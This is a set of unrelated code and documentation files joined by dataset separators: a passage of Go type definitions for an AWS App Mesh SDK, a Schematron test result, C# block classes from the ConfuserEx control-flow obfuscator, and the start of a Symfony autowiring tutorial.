func (*ListenerTimeoutMemberTcp) isListenerTimeout() {}
// An object that represents types of timeouts.
type ListenerTimeoutMemberHttp struct {
Value *HttpTimeout
}
func (*ListenerTimeoutMemberHttp) isListenerTimeout() {}
// An object that represents types of timeouts.
type ListenerTimeoutMemberHttp2 struct {
Value *HttpTimeout
}
func (*ListenerTimeoutMemberHttp2) isListenerTimeout() {}
// An object that represents types of timeouts.
type ListenerTimeoutMemberGrpc struct {
Value *GrpcTimeout
}
func (*ListenerTimeoutMemberGrpc) isListenerTimeout() {}
// An object that represents the Transport Layer Security (TLS) properties for a
// listener.
type ListenerTls struct {
// Specify one of the following modes.
//
// * STRICT – Listener only accepts
// connections with TLS enabled.
//
// * PERMISSIVE – Listener accepts connections
// with or without TLS enabled.
//
// * DISABLED – Listener only accepts connections
// without TLS.
Mode ListenerTlsMode
// A reference to an object that represents a listener's TLS certificate.
Certificate ListenerTlsCertificate
}
// An object that represents an AWS Certificate Manager (ACM) certificate.
type ListenerTlsAcmCertificate struct {
// The Amazon Resource Name (ARN) for the certificate. The certificate must meet
// specific requirements and you must have proxy authorization enabled. For more
// information, see Transport Layer Security (TLS)
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/tls.html#virtual-node-tls-prerequisites).
CertificateArn *string
}
// An object that represents a listener's Transport Layer Security (TLS)
// certificate.
type ListenerTlsCertificate interface {
isListenerTlsCertificate()
}
// A reference to an object that represents an AWS Certificate Manager (ACM)
// certificate.
type ListenerTlsCertificateMemberAcm struct {
Value *ListenerTlsAcmCertificate
}
func (*ListenerTlsCertificateMemberAcm) isListenerTlsCertificate() {}
// A reference to an object that represents a local file certificate.
type ListenerTlsCertificateMemberFile struct {
Value *ListenerTlsFileCertificate
}
func (*ListenerTlsCertificateMemberFile) isListenerTlsCertificate() {}
// An object that represents a local file certificate. The certificate must meet
// specific requirements and you must have proxy authorization enabled. For more
// information, see Transport Layer Security (TLS)
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/tls.html#virtual-node-tls-prerequisites).
type ListenerTlsFileCertificate struct {
// The certificate chain for the certificate.
CertificateChain *string
// The private key for a certificate stored on the file system of the virtual node
// that the proxy is running on.
PrivateKey *string
}
// An object that represents the logging information for a virtual node.
type Logging struct {
// The access log configuration for a virtual node.
AccessLog AccessLog
}
// An object that represents the range of values to match on. The first character
// of the range is included in the range, though the last character is not. For
// example, if the range specified were 1-100, only values 1-99 would be matched.
type MatchRange struct {
// The start of the range (inclusive).
Start *int64
// The end of the range (exclusive).
End *int64
}
// An object that represents a service mesh returned by a describe operation.
type MeshData struct {
// The name of the service mesh.
MeshName *string
// The associated specification for the service mesh.
Spec *MeshSpec
// The associated metadata for the service mesh.
Metadata *ResourceMetadata
// The status of the service mesh.
Status *MeshStatus
}
// An object that represents a service mesh returned by a list operation.
type MeshRef struct {
// The name of the service mesh.
MeshName *string
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) of the service mesh.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents the specification of a service mesh.
type MeshSpec struct {
// The egress filter rules for the service mesh.
EgressFilter *EgressFilter
}
// An object that represents the status of a service mesh.
type MeshStatus struct {
// The current mesh status.
Status MeshStatusCode
}
// An object that represents a port mapping.
type PortMapping struct {
// The port used for the port mapping.
Port *int32
// The protocol used for the port mapping. Specify one protocol.
Protocol PortProtocol
}
// An object that represents metadata for a resource.
type ResourceMetadata struct {
// The full Amazon Resource Name (ARN) for the resource.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The unique identifier for the resource.
Uid *string
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
}
// An object that represents a route returned by a describe operation.
type RouteData struct {
// The name of the service mesh that the route resides in.
MeshName *string
// The virtual router that the route is associated with.
VirtualRouterName *string
// The name of the route.
RouteName *string
// The specifications of the route.
Spec *RouteSpec
// The associated metadata for the route.
Metadata *ResourceMetadata
// The status of the route.
Status *RouteStatus
}
// An object that represents a route returned by a list operation.
type RouteRef struct {
// The name of the service mesh that the route resides in.
MeshName *string
// The virtual router that the route is associated with.
VirtualRouterName *string
// The name of the route.
RouteName *string
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) for the route.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents a route specification. Specify one route type.
type RouteSpec struct {
// The priority for the route. Routes are matched based on the specified value,
// where 0 is the highest priority.
Priority *int32
// An object that represents the specification of an HTTP route.
HttpRoute *HttpRoute
// An object that represents the specification of a TCP route.
TcpRoute *TcpRoute
// An object that represents the specification of an HTTP/2 route.
// NOTE(review): HTTP/2 routes reuse the HttpRoute shape here — confirm this
// matches the service model (a dedicated Http2Route shape is not defined in
// this file).
Http2Route *HttpRoute
// An object that represents the specification of a gRPC route.
GrpcRoute *GrpcRoute
}
// An object that represents the current status of a route.
type RouteStatus struct {
// The current status for the route.
Status RouteStatusCode
}
// An object that represents the service discovery information for a virtual node.
// This is a tagged union: exactly one member type is set.
type ServiceDiscovery interface {
isServiceDiscovery()
}
// Specifies the DNS information for the virtual node.
type ServiceDiscoveryMemberDns struct {
Value *DnsServiceDiscovery
}
func (*ServiceDiscoveryMemberDns) isServiceDiscovery() {}
// Specifies any AWS Cloud Map information for the virtual node.
type ServiceDiscoveryMemberAwsCloudMap struct {
Value *AwsCloudMapServiceDiscovery
}
func (*ServiceDiscoveryMemberAwsCloudMap) isServiceDiscovery() {}
// Optional metadata that you apply to a resource to assist with categorization and
// organization. Each tag consists of a key and an optional value, both of which
// you define. Tag keys can have a maximum character length of 128 characters, and
// tag values can have a maximum length of 256 characters.
type TagRef struct {
// One part of a key-value pair that makes up a tag. A key is a general label that
// acts like a category for more specific tag values.
Key *string
// The optional part of a key-value pair that makes up a tag. A value acts as a
// descriptor within a tag category (key).
Value *string
}
// An object that represents a TCP route type.
type TcpRoute struct {
// The action to take if a match is determined.
Action *TcpRouteAction
// An object that represents types of timeouts.
Timeout *TcpTimeout
}
// An object that represents the action to take if a match is determined.
type TcpRouteAction struct {
// An object that represents the targets that traffic is routed to when a request
// matches the route.
WeightedTargets []*WeightedTarget
}
// An object that represents types of timeouts.
type TcpTimeout struct {
// An object that represents a duration of time.
Idle *Duration
}
// An object that represents a Transport Layer Security (TLS) validation context.
type TlsValidationContext struct {
// A reference to an object that represents a TLS validation context trust.
Trust TlsValidationContextTrust
}
// An object that represents a TLS validation context trust for an AWS Certificate
// Manager (ACM) certificate.
type TlsValidationContextAcmTrust struct {
// One or more ACM Amazon Resource Name (ARN)s.
CertificateAuthorityArns []*string
}
// An object that represents a Transport Layer Security (TLS) validation context
// trust for a local file.
type TlsValidationContextFileTrust struct {
// The certificate trust chain for a certificate stored on the file system of the
// virtual node that the proxy is running on.
CertificateChain *string
}
// An object that represents a Transport Layer Security (TLS) validation context
// trust.
type TlsValidationContextTrust interface {
isTlsValidationContextTrust()
}
// A reference to an object that represents a TLS validation context trust for an
// AWS Certificate Manager (ACM) certificate.
type TlsValidationContextTrustMemberAcm struct {
Value *TlsValidationContextAcmTrust
}
func (*TlsValidationContextTrustMemberAcm) isTlsValidationContextTrust() {}
// An object that represents a TLS validation context trust for a local file.
type TlsValidationContextTrustMemberFile struct {
Value *TlsValidationContextFileTrust
}
func (*TlsValidationContextTrustMemberFile) isTlsValidationContextTrust() {}
// The access log configuration for a virtual gateway.
type VirtualGatewayAccessLog interface {
isVirtualGatewayAccessLog()
}
// The file object to send virtual gateway access logs to.
type VirtualGatewayAccessLogMemberFile struct {
Value *VirtualGatewayFileAccessLog
}
func (*VirtualGatewayAccessLogMemberFile) isVirtualGatewayAccessLog() {}
// An object that represents the default properties for a backend.
type VirtualGatewayBackendDefaults struct {
// A reference to an object that represents a client policy.
ClientPolicy *VirtualGatewayClientPolicy
}
// An object that represents a client policy.
type VirtualGatewayClientPolicy struct {
// A reference to an object that represents a Transport Layer Security (TLS) client
// policy.
Tls *VirtualGatewayClientPolicyTls
}
// An object that represents a Transport Layer Security (TLS) client policy.
type VirtualGatewayClientPolicyTls struct {
// Whether the policy is enforced. The default is True, if a value isn't specified.
Enforce *bool
// One or more ports that the policy is enforced for.
Ports []*int32
// A reference to an object that represents a TLS validation context.
Validation *VirtualGatewayTlsValidationContext
}
// An object that represents a virtual gateway returned by a describe operation.
type VirtualGatewayData struct {
// The name of the service mesh that the virtual gateway resides in.
MeshName *string
// The name of the virtual gateway.
VirtualGatewayName *string
// The specifications of the virtual gateway.
Spec *VirtualGatewaySpec
// An object that represents metadata for a resource.
Metadata *ResourceMetadata
// The current status of the virtual gateway.
Status *VirtualGatewayStatus
}
// An object that represents an access log file.
type VirtualGatewayFileAccessLog struct {
// The file path to write access logs to. You can use /dev/stdout to send access
// logs to standard out and configure your Envoy container to use a log driver,
// such as awslogs, to export the access logs to a log storage service such as
// Amazon CloudWatch Logs. You can also specify a path in the Envoy container's
// file system to write the files to disk.
Path *string
}
// An object that represents the health check policy for a virtual gateway's
// listener.
type VirtualGatewayHealthCheckPolicy struct {
// The amount of time to wait when receiving a response from the health check, in
// milliseconds.
TimeoutMillis *int64
// The time period in milliseconds between each health check execution.
IntervalMillis *int64
// The protocol for the health check request. If you specify grpc, then your
// service must conform to the GRPC Health Checking Protocol
// (https://github.com/grpc/grpc/blob/master/doc/health-checking.md).
Protocol VirtualGatewayPortProtocol
// The destination port for the health check request. This port must match the port
// defined in the PortMapping for the listener.
Port *int32
// The destination path for the health check request. This value is only used if
// the specified protocol is HTTP or HTTP/2. For any other protocol, this value is
// ignored.
Path *string
// The number of consecutive successful health checks that must occur before
// declaring the listener healthy.
HealthyThreshold *int32
// The number of consecutive failed health checks that must occur before declaring
// a virtual gateway unhealthy.
UnhealthyThreshold *int32
}
// An object that represents a listener for a virtual gateway.
type VirtualGatewayListener struct {
// The health check information for the listener.
HealthCheck *VirtualGatewayHealthCheckPolicy
// The port mapping information for the listener.
PortMapping *VirtualGatewayPortMapping
// A reference to an object that represents the Transport Layer Security (TLS)
// properties for the listener.
Tls *VirtualGatewayListenerTls
}
// An object that represents the Transport Layer Security (TLS) properties for a
// listener.
type VirtualGatewayListenerTls struct {
// Specify one of the following modes.
//
// * STRICT – Listener only accepts
// connections with TLS enabled.
//
// * PERMISSIVE – Listener accepts connections
// with or without TLS enabled.
//
// * DISABLED – Listener only accepts connections
// without TLS.
Mode VirtualGatewayListenerTlsMode
// An object that represents a Transport Layer Security (TLS) certificate.
Certificate VirtualGatewayListenerTlsCertificate
}
// An object that represents an AWS Certificate Manager (ACM) certificate.
type VirtualGatewayListenerTlsAcmCertificate struct {
// The Amazon Resource Name (ARN) for the certificate. The certificate must meet
// specific requirements and you must have proxy authorization enabled. For more
// information, see Transport Layer Security (TLS)
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/tls.html#virtual-node-tls-prerequisites).
CertificateArn *string
}
// An object that represents a listener's Transport Layer Security (TLS)
// certificate.
type VirtualGatewayListenerTlsCertificate interface {
isVirtualGatewayListenerTlsCertificate()
}
// A reference to an object that represents an AWS Certificate Manager (ACM)
// certificate.
type VirtualGatewayListenerTlsCertificateMemberAcm struct {
Value *VirtualGatewayListenerTlsAcmCertificate
}
func (*VirtualGatewayListenerTlsCertificateMemberAcm) isVirtualGatewayListenerTlsCertificate() {}
// A reference to an object that represents a local file certificate.
type VirtualGatewayListenerTlsCertificateMemberFile struct {
Value *VirtualGatewayListenerTlsFileCertificate
}
func (*VirtualGatewayListenerTlsCertificateMemberFile) isVirtualGatewayListenerTlsCertificate() {}
// An object that represents a local file certificate. The certificate must meet
// specific requirements and you must have proxy authorization enabled. For more
// information, see Transport Layer Security (TLS)
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/tls.html#virtual-node-tls-prerequisites).
type VirtualGatewayListenerTlsFileCertificate struct {
// The certificate chain for the certificate.
CertificateChain *string
// The private key for a certificate stored on the file system of the mesh endpoint
// that the proxy is running on.
PrivateKey *string
}
// An object that represents logging information.
type VirtualGatewayLogging struct {
// The access log configuration.
AccessLog VirtualGatewayAccessLog
}
// An object that represents a port mapping.
type VirtualGatewayPortMapping struct {
// The port used for the port mapping.
Port *int32
// The protocol used for the port mapping. Specify one protocol.
Protocol VirtualGatewayPortProtocol
}
// An object that represents a virtual gateway returned by a list operation.
type VirtualGatewayRef struct {
// The name of the service mesh that the resource resides in.
MeshName *string
// The name of the resource.
VirtualGatewayName *string
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) for the resource.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents the specification of a service mesh resource.
type VirtualGatewaySpec struct {
// A reference to an object that represents the defaults for backends.
BackendDefaults *VirtualGatewayBackendDefaults
// The listeners that the mesh endpoint is expected to receive inbound traffic
// from. You can specify one listener.
Listeners []*VirtualGatewayListener
// An object that represents logging information.
Logging *VirtualGatewayLogging
}
// An object that represents the status of the mesh resource.
type VirtualGatewayStatus struct {
// The current status.
Status VirtualGatewayStatusCode
}
// An object that represents a Transport Layer Security (TLS) validation context.
type VirtualGatewayTlsValidationContext struct {
// A reference to an object that represents a TLS validation context trust.
Trust VirtualGatewayTlsValidationContextTrust
}
// An object that represents a TLS validation context trust for an AWS Certificate
// Manager (ACM) certificate.
type VirtualGatewayTlsValidationContextAcmTrust struct {
// One or more ACM Amazon Resource Name (ARN)s.
CertificateAuthorityArns []*string
}
// An object that represents a Transport Layer Security (TLS) validation context
// trust for a local file.
type VirtualGatewayTlsValidationContextFileTrust struct {
// The certificate trust chain for a certificate stored on the file system of the
// virtual node that the proxy is running on.
CertificateChain *string
}
// An object that represents a Transport Layer Security (TLS) validation context
// trust.
type VirtualGatewayTlsValidationContextTrust interface {
isVirtualGatewayTlsValidationContextTrust()
}
// A reference to an object that represents a TLS validation context trust for an
// AWS Certificate Manager (ACM) certificate.
type VirtualGatewayTlsValidationContextTrustMemberAcm struct {
Value *VirtualGatewayTlsValidationContextAcmTrust
}
func (*VirtualGatewayTlsValidationContextTrustMemberAcm) isVirtualGatewayTlsValidationContextTrust() {
}
// An object that represents a TLS validation context trust for a local file.
type VirtualGatewayTlsValidationContextTrustMemberFile struct {
Value *VirtualGatewayTlsValidationContextFileTrust
}
func (*VirtualGatewayTlsValidationContextTrustMemberFile) isVirtualGatewayTlsValidationContextTrust() {
}
// An object that represents a virtual node returned by a describe operation.
type VirtualNodeData struct {
// The name of the service mesh that the virtual node resides in.
MeshName *string
// The name of the virtual node.
VirtualNodeName *string
// The specifications of the virtual node.
Spec *VirtualNodeSpec
// The associated metadata for the virtual node.
Metadata *ResourceMetadata
// The current status for the virtual node.
Status *VirtualNodeStatus
}
// An object that represents a virtual node returned by a list operation.
type VirtualNodeRef struct {
// The name of the service mesh that the virtual node resides in.
MeshName *string
// The name of the virtual node.
VirtualNodeName *string
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) for the virtual node.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents a virtual node service provider.
type VirtualNodeServiceProvider struct {
// The name of the virtual node that is acting as a service provider.
VirtualNodeName *string
}
// An object that represents the specification of a virtual node.
type VirtualNodeSpec struct {
// The service discovery information for the virtual node. If your virtual node
// does not expect ingress traffic, you can omit this parameter. If you specify a
// listener, then you must specify service discovery information.
ServiceDiscovery ServiceDiscovery
// The listener that the virtual node is expected to receive inbound traffic from.
// You can specify one listener.
Listeners []*Listener
// The backends that the virtual node is expected to send outbound traffic to.
Backends []Backend
// A reference to an object that represents the defaults for backends.
BackendDefaults *BackendDefaults
// The inbound and outbound access logging information for the virtual node.
Logging *Logging
}
// An object that represents the current status of the virtual node.
type VirtualNodeStatus struct {
// The current status of the virtual node.
Status VirtualNodeStatusCode
}
// An object that represents a virtual router returned by a describe operation.
type VirtualRouterData struct {
// The name of the service mesh that the virtual router resides in.
MeshName *string
// The name of the virtual router.
VirtualRouterName *string
// The specifications of the virtual router.
Spec *VirtualRouterSpec
// The associated metadata for the virtual router.
Metadata *ResourceMetadata
// The current status of the virtual router.
Status *VirtualRouterStatus
}
// An object that represents a virtual router listener.
type VirtualRouterListener struct {
// An object that represents a port mapping.
PortMapping *PortMapping
}
// An object that represents a virtual router returned by a list operation.
type VirtualRouterRef struct {
// The name of the service mesh that the virtual router resides in.
MeshName *string
// The name of the virtual router.
VirtualRouterName *string
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) for the virtual router.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents a virtual router service provider.
type VirtualRouterServiceProvider struct {
// The name of the virtual router that is acting as a service provider.
VirtualRouterName *string
}
// An object that represents the specification of a virtual router.
type VirtualRouterSpec struct {
// The listeners that the virtual router is expected to receive inbound traffic
// from. You can specify one listener.
Listeners []*VirtualRouterListener
}
// An object that represents the status of a virtual router.
type VirtualRouterStatus struct {
// The current status of the virtual router.
Status VirtualRouterStatusCode
}
// An object that represents a virtual service backend for a virtual node.
type VirtualServiceBackend struct {
// The name of the virtual service that is acting as a virtual node backend.
VirtualServiceName *string
// A reference to an object that represents the client policy for a backend.
ClientPolicy *ClientPolicy
}
// An object that represents a virtual service returned by a describe operation.
type VirtualServiceData struct {
// The name of the service mesh that the virtual service resides in.
MeshName *string
// The name of the virtual service.
VirtualServiceName *string
// The specifications of the virtual service.
Spec *VirtualServiceSpec
// An object that represents metadata for a resource.
Metadata *ResourceMetadata
// The current status of the virtual service.
Status *VirtualServiceStatus
}
// An object that represents the provider for a virtual service. This is a tagged
// union: exactly one member type is set.
type VirtualServiceProvider interface {
isVirtualServiceProvider()
}
// The virtual node associated with a virtual service.
type VirtualServiceProviderMemberVirtualNode struct {
Value *VirtualNodeServiceProvider
}
func (*VirtualServiceProviderMemberVirtualNode) isVirtualServiceProvider() {}
// The virtual router associated with a virtual service.
type VirtualServiceProviderMemberVirtualRouter struct {
Value *VirtualRouterServiceProvider
}
func (*VirtualServiceProviderMemberVirtualRouter) isVirtualServiceProvider() {}
// An object that represents a virtual service returned by a list operation.
type VirtualServiceRef struct {
// The name of the service mesh that the virtual service resides in.
MeshName *string
// The name of the virtual service.
VirtualServiceName *string
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) for the virtual service.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents the specification of a virtual service.
type VirtualServiceSpec struct {
// The App Mesh object that is acting as the provider for a virtual service. You
// can specify a single virtual node or virtual router.
Provider VirtualServiceProvider
}
// An object that represents the status of a virtual service.
type VirtualServiceStatus struct {
// The current status of the virtual service.
Status VirtualServiceStatusCode
}
// An object that represents a target and its relative weight. Traffic is
// distributed across targets according to their relative weight. For example, a
// weighted target with a relative weight of 50 receives five times as much traffic
// as one with a relative weight of 10. The total weight for all targets combined
// must be less than or equal to 100.
type WeightedTarget struct {
// The virtual node to associate with the weighted target.
VirtualNode *string
// The relative weight of the weighted target.
Weight *int32
}
// UnknownUnionMember is returned when a union member is returned over the wire,
// but has an unknown tag.
type UnknownUnionMember struct {
// The unrecognized union tag received over the wire.
Tag string
// The raw serialized bytes of the unrecognized member.
Value []byte
}
func (*UnknownUnionMember) isAccessLog() {}
func (*UnknownUnionMember) isBackend() {}
func (*UnknownUnionMember) isGrpcRouteMetadataMatchMethod() {}
func (*UnknownUnionMember) isHeaderMatchMethod() {}
func (*UnknownUnionMember) isListenerTimeout() {}
func (*UnknownUnionMember) isListenerTlsCertificate() {}
func (*UnknownUnionMember) isServiceDiscovery() {}
func (*UnknownUnionMember) isTlsValidationContextTrust() {}
func (*UnknownUnionMember) isVirtualGatewayAccessLog() {}
func (*UnknownUnionMember) isVirtualGatewayListenerTlsCertificate() {}
func (*UnknownUnionMember) isVirtualGatewayTlsValidationContextTrust() {}
func (*UnknownUnionMember) isVirtualServiceProvider() {}
| {
"pile_set_name": "Github"
} |
Pattern: Number of characters in an abbreviation
/AAA/BBB line 2: There is too much letters in the abbreviation
./test/schematron/zvon12_2.xml fails to validate
| {
"pile_set_name": "Github"
} |
#region
using System.Collections.Generic;
using System.Linq;
using System.Text;
using dnlib.DotNet.Emit;
#endregion
namespace Confuser.Protections.ControlFlow
{
/// <summary>
///     Base class for the nodes of a method body's control-flow tree: either a
///     straight run of instructions (<see cref="InstrBlock" />) or a scope that
///     groups child blocks (<see cref="ScopeBlock" />).
/// </summary>
internal abstract class BlockBase
{
/// <summary>Initializes the block with its structural type.</summary>
/// <param name="type">The kind of block (normal, try, handler, ...).</param>
public BlockBase(BlockType type)
{
Type = type;
}
/// <summary>
///     The scope block that contains this block, if any.
///     NOTE(review): no assignment to this property is visible in this file —
///     presumably set elsewhere when the block tree is built; confirm.
/// </summary>
public ScopeBlock Parent
{
get;
private set;
}
/// <summary>The structural kind of this block.</summary>
public BlockType Type
{
get;
}
/// <summary>
///     Writes this block's instructions into <paramref name="body" />, restoring
///     any exception-handler boundaries the block represents.
/// </summary>
public abstract void ToBody(CilBody body);
}
/// <summary>
///     The structural kind of a <see cref="BlockBase" />, mirroring the regions
///     of a CIL exception-handling clause.
/// </summary>
internal enum BlockType
{
// A plain run of instructions outside any exception-handling construct.
Normal,
// The protected (try) region of an exception handler.
Try,
// The catch/handler region of an exception handler.
Handler,
// The finally region of an exception handler.
Finally,
// The filter region of a filter exception handler.
Filter,
// The fault region of an exception handler.
Fault
}
/// <summary>
///     A block that groups child blocks and optionally represents one region
///     (try/handler/filter/finally/fault) of an exception handler.
/// </summary>
internal class ScopeBlock : BlockBase
{
    /// <summary>Initializes a scope block.</summary>
    /// <param name="type">The handler region this scope represents, or <see cref="BlockType.Normal" />.</param>
    /// <param name="handler">The exception handler the scope belongs to; null for normal scopes.</param>
    public ScopeBlock(BlockType type, ExceptionHandler handler)
        : base(type)
    {
        Handler = handler;
        Children = new List<BlockBase>();
    }

    /// <summary>The exception handler this scope belongs to, if any.</summary>
    public ExceptionHandler Handler
    {
        get;
    }

    /// <summary>The child blocks of this scope, in execution order.</summary>
    public List<BlockBase> Children
    {
        get;
        set;
    }

    public override string ToString()
    {
        var ret = new StringBuilder();
        if(Type == BlockType.Try)
            ret.Append("try ");
        else if(Type == BlockType.Handler)
            ret.Append("handler ");
        else if(Type == BlockType.Finally)
            ret.Append("finally ");
        else if(Type == BlockType.Filter)
            ret.Append("filter "); // FIX: filter scopes were previously printed without a label
        else if(Type == BlockType.Fault)
            ret.Append("fault ");
        ret.AppendLine("{");
        foreach(var child in Children)
            ret.Append(child);
        ret.AppendLine("}");
        return ret.ToString();
    }

    /// <summary>
    ///     Returns the first instruction contained in this scope, descending into
    ///     nested scopes as needed.
    /// </summary>
    public Instruction GetFirstInstr()
    {
        var firstBlock = Children.First();
        var scope = firstBlock as ScopeBlock;
        if(scope != null)
            return scope.GetFirstInstr();
        return ((InstrBlock) firstBlock).Instructions.First();
    }

    /// <summary>
    ///     Returns the last instruction contained in this scope, descending into
    ///     nested scopes as needed.
    /// </summary>
    public Instruction GetLastInstr()
    {
        // FIX: renamed from the misleading 'firstBlock' of the original.
        var lastBlock = Children.Last();
        var scope = lastBlock as ScopeBlock;
        if(scope != null)
            return scope.GetLastInstr();
        return ((InstrBlock) lastBlock).Instructions.Last();
    }

    /// <summary>
    ///     Emits all child blocks into <paramref name="body" /> and records the
    ///     boundaries of the exception-handler region this scope represents.
    /// </summary>
    public override void ToBody(CilBody body)
    {
        if(Type != BlockType.Normal)
        {
            if(Type == BlockType.Try)
            {
                Handler.TryStart = GetFirstInstr();
                Handler.TryEnd = GetLastInstr();
            }
            else if(Type == BlockType.Filter)
            {
                // A filter region only records its start; the handler scope that
                // follows it sets HandlerStart/HandlerEnd.
                Handler.FilterStart = GetFirstInstr();
            }
            else
            {
                Handler.HandlerStart = GetFirstInstr();
                Handler.HandlerEnd = GetLastInstr();
            }
        }
        foreach(var block in Children)
            block.ToBody(body);
    }
}
internal class InstrBlock : BlockBase
{
public InstrBlock()
: base(BlockType.Normal)
{
Instructions = new List<Instruction>();
}
public List<Instruction> Instructions
{
get;
set;
}
public override string ToString()
{
var ret = new StringBuilder();
foreach(var instr in Instructions)
ret.AppendLine(instr.ToString());
return ret.ToString();
}
public override void ToBody(CilBody body)
{
foreach(var instr in Instructions)
body.Instructions.Add(instr);
}
}
} | {
"pile_set_name": "Github"
} |
.. index::
single: DependencyInjection; Autowiring
Defining Services Dependencies Automatically (Autowiring)
=========================================================
Autowiring allows you to manage services in the container with minimal
configuration. It reads the type-hints on your constructor (or other methods)
and automatically passes the correct services to each method. Symfony's
autowiring is designed to be predictable: if it is not absolutely clear which
dependency should be passed, you'll see an actionable exception.
.. tip::
Thanks to Symfony's compiled container, there is no runtime overhead for using
autowiring.
An Autowiring Example
---------------------
Imagine you're building an API to publish statuses on a Twitter feed, obfuscated
with `ROT13`_, a fun encoder that shifts all characters 13 letters forward in
the alphabet.
Start by creating a ROT13 transformer class::
namespace App\Util;
class Rot13Transformer
{
public function transform($value)
{
return str_rot13($value);
}
}
And now a Twitter client using this transformer::
namespace App\Service;
use App\Util\Rot13Transformer;
class TwitterClient
{
private $transformer;
public function __construct(Rot13Transformer $transformer)
{
$this->transformer = $transformer;
}
public function tweet($user, $key, $status)
{
$transformedStatus = $this->transformer->transform($status);
// ... connect to Twitter and send the encoded status
}
}
